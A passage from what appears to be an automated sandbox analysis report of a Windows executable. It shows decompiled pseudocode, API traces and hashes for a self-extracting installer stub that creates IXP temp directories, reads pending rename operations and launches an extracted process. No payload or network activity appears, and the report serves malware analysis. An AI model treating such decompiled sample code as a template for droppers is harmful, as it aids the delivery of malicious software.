                                                                                                                                                                                                                                            • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,010D4096,?,010D1ED3,00000001,00000000,?,?,010D4137,?,010D4096), ref: 010D25CB
                                                                                                                                                                                                                                            • RegCloseKey.KERNELBASE(?,?,010D1ED3,00000001,00000000,?,?,010D4137,?,010D4096), ref: 010D25DD
                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,?,010D4096,010D4096,?,010D1ED3,00000001,00000000,?,?,010D4137,?), ref: 010D25FF
                                                                                                                                                                                                                                            • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,010D4096,00000000,00000000,00000000,00000000,?,010D1ED3,00000001,00000000), ref: 010D261A
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • PendingFileRenameOperations, xrefs: 010D25C3
                                                                                                                                                                                                                                            • System\CurrentControlSet\Control\Session Manager, xrefs: 010D25A8
                                                                                                                                                                                                                                            • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 010D25F5
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
• Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: OpenQuery$CloseInfoValue
                                                                                                                                                                                                                                            • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                                                                                                                                                            • API String ID: 2209512893-559176071
                                                                                                                                                                                                                                            • Opcode ID: d0d37ae17d366bcd7b35f59c491ea1245e9ff04864f44483e9a216450ed3d9ca
                                                                                                                                                                                                                                            • Instruction ID: a8febf2f5709e3f9c0e8a330b2bdf3bd453087c2500338c011d24689b58f7139
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d0d37ae17d366bcd7b35f59c491ea1245e9ff04864f44483e9a216450ed3d9ca
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D3118F35A02328FB9B309B969C09DFFBEBCEF057A1F504095F989A2004D6314A44D6A0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%


                                                                                                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                                                                                                            			E010D53A1(CHAR* __ecx, CHAR* __edx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t5;
                                                                                                                                                                                                                                            				long _t13;
                                                                                                                                                                                                                                            				int _t14;
                                                                                                                                                                                                                                            				CHAR* _t20;
                                                                                                                                                                                                                                            				int _t29;
                                                                                                                                                                                                                                            				int _t30;
                                                                                                                                                                                                                                            				CHAR* _t32;
                                                                                                                                                                                                                                            				signed int _t33;
                                                                                                                                                                                                                                            				void* _t34;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t5 =  *0x10d8004; // 0xc2f4ed82
                                                                                                                                                                                                                                            				_v8 = _t5 ^ _t33;
                                                                                                                                                                                                                                            				_t32 = __edx;
                                                                                                                                                                                                                                            				_t20 = __ecx;
                                                                                                                                                                                                                                            				_t29 = 0;
                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                            					E010D171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
                                                                                                                                                                                                                                            					_t34 = _t34 + 0x10;
                                                                                                                                                                                                                                            					_t29 = _t29 + 1;
                                                                                                                                                                                                                                            					E010D1680(_t32, 0x104, _t20);
                                                                                                                                                                                                                                            					E010D658A(_t32, 0x104,  &_v268); // executed
                                                                                                                                                                                                                                            					RemoveDirectoryA(_t32); // executed
                                                                                                                                                                                                                                            					_t13 = GetFileAttributesA(_t32); // executed
                                                                                                                                                                                                                                            					if(_t13 == 0xffffffff) {
                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(_t29 < 0x190) {
                                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L3:
                                                                                                                                                                                                                                            					_t30 = 0;
                                                                                                                                                                                                                                            					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
                                                                                                                                                                                                                                            						_t30 = 1;
                                                                                                                                                                                                                                            						DeleteFileA(_t32);
                                                                                                                                                                                                                                            						CreateDirectoryA(_t32, 0);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L5:
                                                                                                                                                                                                                                            					return E010D6CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t14 = CreateDirectoryA(_t32, 0); // executed
                                                                                                                                                                                                                                            				if(_t14 == 0) {
                                                                                                                                                                                                                                            					goto L3;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t30 = 1;
                                                                                                                                                                                                                                            				 *0x10d8a20 = 1;
                                                                                                                                                                                                                                            				goto L5;
                                                                                                                                                                                                                                            			}


















                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 010D171E: _vsnprintf.MSVCRT ref: 010D1750
                                                                                                                                                                                                                                            • RemoveDirectoryA.KERNELBASE(?,?,010D91E4,?,00000001,010D91E4,00000000), ref: 010D53FB
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNELBASE(?,?,00000001,010D91E4,00000000), ref: 010D5402
                                                                                                                                                                                                                                            • GetTempFileNameA.KERNEL32(010D91E4,IXP,00000000,?,?,00000001,010D91E4,00000000), ref: 010D541F
                                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?,?,00000001,010D91E4,00000000), ref: 010D542B
                                                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,010D91E4,00000000), ref: 010D5434
                                                                                                                                                                                                                                            • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,010D91E4,00000000), ref: 010D5452
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                                                                                                                                                                                            • String ID: IXP$IXP%03d.TMP
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 51%
                                                                                                                                                                                                                                            			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                                                            				signed int* _t25;
                                                                                                                                                                                                                                            				signed int _t26;
                                                                                                                                                                                                                                            				signed int _t29;
                                                                                                                                                                                                                                            				int _t30;
                                                                                                                                                                                                                                            				signed int _t37;
                                                                                                                                                                                                                                            				signed char _t41;
                                                                                                                                                                                                                                            				signed int _t53;
                                                                                                                                                                                                                                            				signed int _t54;
                                                                                                                                                                                                                                            				intOrPtr _t56;
                                                                                                                                                                                                                                            				signed int _t58;
                                                                                                                                                                                                                                            				signed int _t59;
                                                                                                                                                                                                                                            				intOrPtr* _t60;
                                                                                                                                                                                                                                            				void* _t62;
                                                                                                                                                                                                                                            				void* _t67;
                                                                                                                                                                                                                                            				void* _t68;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				E010D7155();
                                                                                                                                                                                                                                            				_push(0x58);
                                                                                                                                                                                                                                            				_push(0x10d72b8);
                                                                                                                                                                                                                                            				E010D7208(__ebx, __edi, __esi);
                                                                                                                                                                                                                                            				 *(_t62 - 0x20) = 0;
                                                                                                                                                                                                                                            				GetStartupInfoW(_t62 - 0x68);
                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t62 - 4)) = 0;
                                                                                                                                                                                                                                            				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
                                                                                                                                                                                                                                            				_t53 = 0;
                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                            					asm("lock cmpxchg [edx], ecx");
                                                                                                                                                                                                                                            					if(0 == 0) {
                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(0 != _t56) {
                                                                                                                                                                                                                                            						Sleep(0x3e8);
                                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t58 = 1;
                                                                                                                                                                                                                                            						_t53 = 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L7:
                                                                                                                                                                                                                                            					_t67 =  *0x10d88b0 - _t58; // 0x2
                                                                                                                                                                                                                                            					if(_t67 != 0) {
                                                                                                                                                                                                                                            						__eflags =  *0x10d88b0; // 0x2
                                                                                                                                                                                                                                            						if(__eflags != 0) {
                                                                                                                                                                                                                                            							 *0x10d81e4 = _t58;
                                                                                                                                                                                                                                            							goto L13;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							 *0x10d88b0 = _t58;
                                                                                                                                                                                                                                            							_t37 = E010D6C3F(0x10d10b8, 0x10d10c4); // executed
                                                                                                                                                                                                                                            							__eflags = _t37;
                                                                                                                                                                                                                                            							if(__eflags == 0) {
                                                                                                                                                                                                                                            								goto L13;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                                                            								_t30 = 0xff;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_push(0x1f);
                                                                                                                                                                                                                                            						L010D6FF4();
                                                                                                                                                                                                                                            						L13:
                                                                                                                                                                                                                                            						_t68 =  *0x10d88b0 - _t58; // 0x2
                                                                                                                                                                                                                                            						if(_t68 == 0) {
                                                                                                                                                                                                                                            							_push(0x10d10b4);
                                                                                                                                                                                                                                            							_push(0x10d10ac);
                                                                                                                                                                                                                                            							L010D7202();
                                                                                                                                                                                                                                            							 *0x10d88b0 = 2;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						if(_t53 == 0) {
                                                                                                                                                                                                                                            							 *0x10d88ac = 0;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t71 =  *0x10d88b4;
                                                                                                                                                                                                                                            						if( *0x10d88b4 != 0 && E010D7060(_t71, 0x10d88b4) != 0) {
                                                                                                                                                                                                                                            							_t60 =  *0x10d88b4; // 0x0
                                                                                                                                                                                                                                            							 *0x10da288(0, 2, 0);
                                                                                                                                                                                                                                            							 *_t60();
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t25 = __imp___acmdln; // 0x74895b9c
                                                                                                                                                                                                                                            						_t59 =  *_t25;
                                                                                                                                                                                                                                            						 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                            						_t54 =  *(_t62 - 0x20);
                                                                                                                                                                                                                                            						while(1) {
                                                                                                                                                                                                                                            							_t41 =  *_t59;
                                                                                                                                                                                                                                            							if(_t41 > 0x20) {
                                                                                                                                                                                                                                            								goto L32;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							if(_t41 != 0) {
                                                                                                                                                                                                                                            								if(_t54 != 0) {
                                                                                                                                                                                                                                            									goto L32;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									while(_t41 != 0 && _t41 <= 0x20) {
                                                                                                                                                                                                                                            										_t59 = _t59 + 1;
                                                                                                                                                                                                                                            										 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                            										_t41 =  *_t59;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags =  *(_t62 - 0x3c) & 0x00000001;
                                                                                                                                                                                                                                            							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                                                                                                                                                                                                                                            								_t29 = 0xa;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_push(_t29);
                                                                                                                                                                                                                                            							_t30 = E010D2BFB(0x10d0000, 0, _t59); // executed
                                                                                                                                                                                                                                            							 *0x10d81e0 = _t30;
                                                                                                                                                                                                                                            							__eflags =  *0x10d81f8;
                                                                                                                                                                                                                                            							if( *0x10d81f8 == 0) {
                                                                                                                                                                                                                                            								exit(_t30); // executed
                                                                                                                                                                                                                                            								goto L32;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags =  *0x10d81e4;
                                                                                                                                                                                                                                            							if( *0x10d81e4 == 0) {
                                                                                                                                                                                                                                            								__imp___cexit();
                                                                                                                                                                                                                                            								_t30 =  *0x10d81e0; // 0x0
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                                                            							goto L40;
                                                                                                                                                                                                                                            							L32:
                                                                                                                                                                                                                                            							__eflags = _t41 - 0x22;
                                                                                                                                                                                                                                            							if(_t41 == 0x22) {
                                                                                                                                                                                                                                            								__eflags = _t54;
                                                                                                                                                                                                                                            								_t15 = _t54 == 0;
                                                                                                                                                                                                                                            								__eflags = _t15;
                                                                                                                                                                                                                                            								_t54 = 0 | _t15;
                                                                                                                                                                                                                                            								 *(_t62 - 0x20) = _t54;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t26 = _t41 & 0x000000ff;
                                                                                                                                                                                                                                            							__imp___ismbblead(_t26);
                                                                                                                                                                                                                                            							__eflags = _t26;
                                                                                                                                                                                                                                            							if(_t26 != 0) {
                                                                                                                                                                                                                                            								_t59 = _t59 + 1;
                                                                                                                                                                                                                                            								__eflags = _t59;
                                                                                                                                                                                                                                            								 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t59 = _t59 + 1;
                                                                                                                                                                                                                                            							 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L40:
                                                                                                                                                                                                                                            					return E010D724D(_t30);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t58 = 1;
                                                                                                                                                                                                                                            				__eflags = 1;
                                                                                                                                                                                                                                            				goto L7;
                                                                                                                                                                                                                                            			}


















                                                                                                                                                                                                                                            0x010d6c2d
                                                                                                                                                                                                                                            0x010d6c2d
                                                                                                                                                                                                                                            0x010d6c32
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d6bc5
                                                                                                                                                                                                                                            0x010d6bc5
                                                                                                                                                                                                                                            0x010d6bc8
                                                                                                                                                                                                                                            0x010d6bcc
                                                                                                                                                                                                                                            0x010d6bce
                                                                                                                                                                                                                                            0x010d6bce
                                                                                                                                                                                                                                            0x010d6bd1
                                                                                                                                                                                                                                            0x010d6bd3
                                                                                                                                                                                                                                            0x010d6bd3
                                                                                                                                                                                                                                            0x010d6bd6
                                                                                                                                                                                                                                            0x010d6bda
                                                                                                                                                                                                                                            0x010d6be1
                                                                                                                                                                                                                                            0x010d6be3
                                                                                                                                                                                                                                            0x010d6be5
                                                                                                                                                                                                                                            0x010d6be5
                                                                                                                                                                                                                                            0x010d6be6
                                                                                                                                                                                                                                            0x010d6be6
                                                                                                                                                                                                                                            0x010d6be9
                                                                                                                                                                                                                                            0x010d6bea
                                                                                                                                                                                                                                            0x010d6bea
                                                                                                                                                                                                                                            0x010d6b74
                                                                                                                                                                                                                                            0x010d6c39
                                                                                                                                                                                                                                            0x010d6c3e
                                                                                                                                                                                                                                            0x010d6c3e
                                                                                                                                                                                                                                            0x010d6abe
                                                                                                                                                                                                                                            0x010d6abe
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 010D7155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 010D7182
                                                                                                                                                                                                                                              • Part of subcall function 010D7155: GetCurrentProcessId.KERNEL32 ref: 010D7191
                                                                                                                                                                                                                                              • Part of subcall function 010D7155: GetCurrentThreadId.KERNEL32 ref: 010D719A
                                                                                                                                                                                                                                              • Part of subcall function 010D7155: GetTickCount.KERNEL32 ref: 010D71A3
                                                                                                                                                                                                                                              • Part of subcall function 010D7155: QueryPerformanceCounter.KERNEL32(?), ref: 010D71B8
                                                                                                                                                                                                                                            • GetStartupInfoW.KERNEL32(?,010D72B8,00000058), ref: 010D6A7F
                                                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 010D6AB4
                                                                                                                                                                                                                                            • _amsg_exit.MSVCRT ref: 010D6AC9
                                                                                                                                                                                                                                            • _initterm.MSVCRT ref: 010D6B1D
                                                                                                                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 010D6B49
                                                                                                                                                                                                                                            • exit.KERNELBASE ref: 010D6BBF
                                                                                                                                                                                                                                            • _ismbblead.MSVCRT ref: 010D6BDA
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 836923961-0
                                                                                                                                                                                                                                            • Opcode ID: af3141745e2081e7024e893b83eb536059e4bd4eceeb40521474327423d80978
                                                                                                                                                                                                                                            • Instruction ID: 94a7c3e117df251ae79181f822699ba4243ca818ce81eb36c296a51779a9a2d9
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: af3141745e2081e7024e893b83eb536059e4bd4eceeb40521474327423d80978
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6A41EF35A45365DBEB729B6DE8057BE7BE4FB44720F14805BEDC197284CB7A4880CB80
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            control_flow_graph 546 10d5467-10d5484 547 10d551c-10d5528 call 10d1680 546->547 548 10d548a-10d5490 call 10d53a1 546->548 552 10d552d-10d5539 call 10d58c8 547->552 551 10d5495-10d5497 548->551 554 10d549d-10d54c0 call 10d1781 551->554 555 10d5581-10d5583 551->555 560 10d554d-10d5552 552->560 561 10d553b-10d5545 CreateDirectoryA 552->561 563 10d550c-10d551a call 10d658a 554->563 564 10d54c2-10d54d8 GetSystemInfo 554->564 558 10d558d-10d559d call 10d6ce0 555->558 568 10d5585-10d558b 560->568 569 10d5554-10d5557 call 10d597d 560->569 566 10d5577-10d557c call 10d6285 561->566 567 10d5547 561->567 563->552 570 10d54fe 564->570 571 10d54da-10d54dd 564->571 566->555 567->560 568->558 577 10d555c-10d555e 569->577 578 10d5503-10d5507 call 10d658a 570->578 575 10d54df-10d54e2 571->575 576 10d54f7-10d54fc 571->576 581 10d54e4-10d54e7 575->581 582 10d54f0-10d54f5 575->582 576->578 577->568 583 10d5560-10d5566 577->583 578->563 581->563 585 10d54e9-10d54ee 581->585 582->578 583->555 586 10d5568-10d5575 RemoveDirectoryA 583->586 585->578 586->555
                                                                                                                                                                                                                                            C-Code - Quality: 75%
                                                                                                                                                                                                                                            			E010D5467(CHAR* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				struct _SYSTEM_INFO _v304;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t10;
                                                                                                                                                                                                                                            				void* _t13;
                                                                                                                                                                                                                                            				intOrPtr _t14;
                                                                                                                                                                                                                                            				void* _t16;
                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                            				signed int _t26;
                                                                                                                                                                                                                                            				void* _t28;
                                                                                                                                                                                                                                            				void* _t29;
                                                                                                                                                                                                                                            				CHAR* _t48;
                                                                                                                                                                                                                                            				signed int _t49;
                                                                                                                                                                                                                                            				intOrPtr _t61;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t10 =  *0x10d8004; // 0xc2f4ed82
                                                                                                                                                                                                                                            				_v8 = _t10 ^ _t49;
                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                            				if(__edx == 0) {
                                                                                                                                                                                                                                            					_t48 = 0x10d91e4;
                                                                                                                                                                                                                                            					_t42 = 0x104;
                                                                                                                                                                                                                                            					E010D1680(0x10d91e4, 0x104);
                                                                                                                                                                                                                                            					L14:
                                                                                                                                                                                                                                            					_t13 = E010D58C8(_t48); // executed
                                                                                                                                                                                                                                            					if(_t13 != 0) {
                                                                                                                                                                                                                                            						L17:
                                                                                                                                                                                                                                            						_t42 = _a4;
                                                                                                                                                                                                                                            						if(_a4 == 0) {
                                                                                                                                                                                                                                            							L23:
				 *0x10d9124 = 0;
				_t14 = 1;
				L24:
				return E010D6CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
			}
			_t16 = E010D597D(_t48, _t42, 1, 0); // executed
			if(_t16 != 0) {
				goto L23;
			}
			_t61 =  *0x10d8a20; // 0x0
			if(_t61 != 0) {
				 *0x10d8a20 = 0;
				RemoveDirectoryA(_t48);
			}
			L22:
			_t14 = 0;
			goto L24;
		}
		if(CreateDirectoryA(_t48, 0) == 0) {
			 *0x10d9124 = E010D6285();
			goto L22;
		}
		 *0x10d8a20 = 1;
		goto L17;
	}
	_t42 =  &_v268;
	_t20 = E010D53A1(__ecx,  &_v268); // executed
	if(_t20 == 0) {
		goto L22;
	}
	_push(__ecx);
	_t48 = 0x10d91e4;
	E010D1781(0x10d91e4, 0x104, __ecx,  &_v268);
	if(( *0x10d9a34 & 0x00000020) == 0) {
		L12:
		_t42 = 0x104;
		E010D658A(_t48, 0x104, 0x10d1140);
		goto L14;
	}
	GetSystemInfo( &_v304);
	_t26 = _v304.dwOemId & 0x0000ffff;
	if(_t26 == 0) {
		_push("i386");
		L11:
		E010D658A(_t48, 0x104);
		goto L12;
	}
	_t28 = _t26 - 1;
	if(_t28 == 0) {
		_push("mips");
		goto L11;
	}
	_t29 = _t28 - 1;
	if(_t29 == 0) {
		_push("alpha");
		goto L11;
	}
	if(_t29 != 1) {
		goto L12;
	}
	_push("ppc");
	goto L11;
}

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetSystemInfo.KERNEL32(?,?,?,?,010D91E4,00000001,010D91E4,00000000), ref: 010D54C9
                                                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(010D91E4,00000000,010D91E4,00000001,010D91E4,00000000), ref: 010D553D
                                                                                                                                                                                                                                            • RemoveDirectoryA.KERNEL32(010D91E4,00000000,010D91E4,00000001,010D91E4,00000000), ref: 010D556F
                                                                                                                                                                                                                                              • Part of subcall function 010D53A1: RemoveDirectoryA.KERNELBASE(?,?,010D91E4,?,00000001,010D91E4,00000000), ref: 010D53FB
                                                                                                                                                                                                                                              • Part of subcall function 010D53A1: GetFileAttributesA.KERNELBASE(?,?,00000001,010D91E4,00000000), ref: 010D5402
                                                                                                                                                                                                                                              • Part of subcall function 010D53A1: GetTempFileNameA.KERNEL32(010D91E4,IXP,00000000,?,?,00000001,010D91E4,00000000), ref: 010D541F
                                                                                                                                                                                                                                              • Part of subcall function 010D53A1: DeleteFileA.KERNEL32(?,?,00000001,010D91E4,00000000), ref: 010D542B
                                                                                                                                                                                                                                              • Part of subcall function 010D53A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,010D91E4,00000000), ref: 010D5434
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                                                                                                                                                                            • String ID: alpha$i386$mips$ppc
                                                                                                                                                                                                                                            • API String ID: 1979080616-1048730182
                                                                                                                                                                                                                                            • Opcode ID: c4e34e9f24eea569ed9133e4d25234710232d6bfd9d3dc8ae0621cfe435231de
                                                                                                                                                                                                                                            • Instruction ID: fd819dcacf4582721589cc42e2be9cf07f8fcb7b62f7ad9da4688b69ee54edfd
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c4e34e9f24eea569ed9133e4d25234710232d6bfd9d3dc8ae0621cfe435231de
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 49314770B013119BDB219B3D9C14ABE7BFAAF91244B84416AEDC2C318CDF76CA018795
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 614 10d3fef-10d4010 615 10d410a-10d411a call 10d6ce0 614->615 616 10d4016-10d403b CreateProcessA 614->616 617 10d40c4-10d4101 call 10d6285 GetLastError FormatMessageA call 10d44b9 616->617 618 10d4041-10d406e WaitForSingleObject GetExitCodeProcess 616->618 630 10d4106 617->630 621 10d4091 call 10d411b 618->621 622 10d4070-10d4077 618->622 629 10d4096-10d40b8 CloseHandle * 2 621->629 622->621 625 10d4079-10d407b 622->625 625->621 628 10d407d-10d4089 625->628 628->621 631 10d408b 628->631 632 10d4108 629->632 633 10d40ba-10d40c0 629->633 630->632 631->621 632->615 633->632 634 10d40c2 633->634 634->630
                                                                                                                                                                                                                                            C-Code - Quality: 84%
                                                                                                                                                                                                                                            			E010D3FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v524;
                                                                                                                                                                                                                                            				long _v528;
                                                                                                                                                                                                                                            				struct _PROCESS_INFORMATION _v544;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t20;
                                                                                                                                                                                                                                            				void* _t22;
                                                                                                                                                                                                                                            				int _t25;
                                                                                                                                                                                                                                            				intOrPtr* _t39;
                                                                                                                                                                                                                                            				signed int _t44;
                                                                                                                                                                                                                                            				void* _t49;
                                                                                                                                                                                                                                            				signed int _t50;
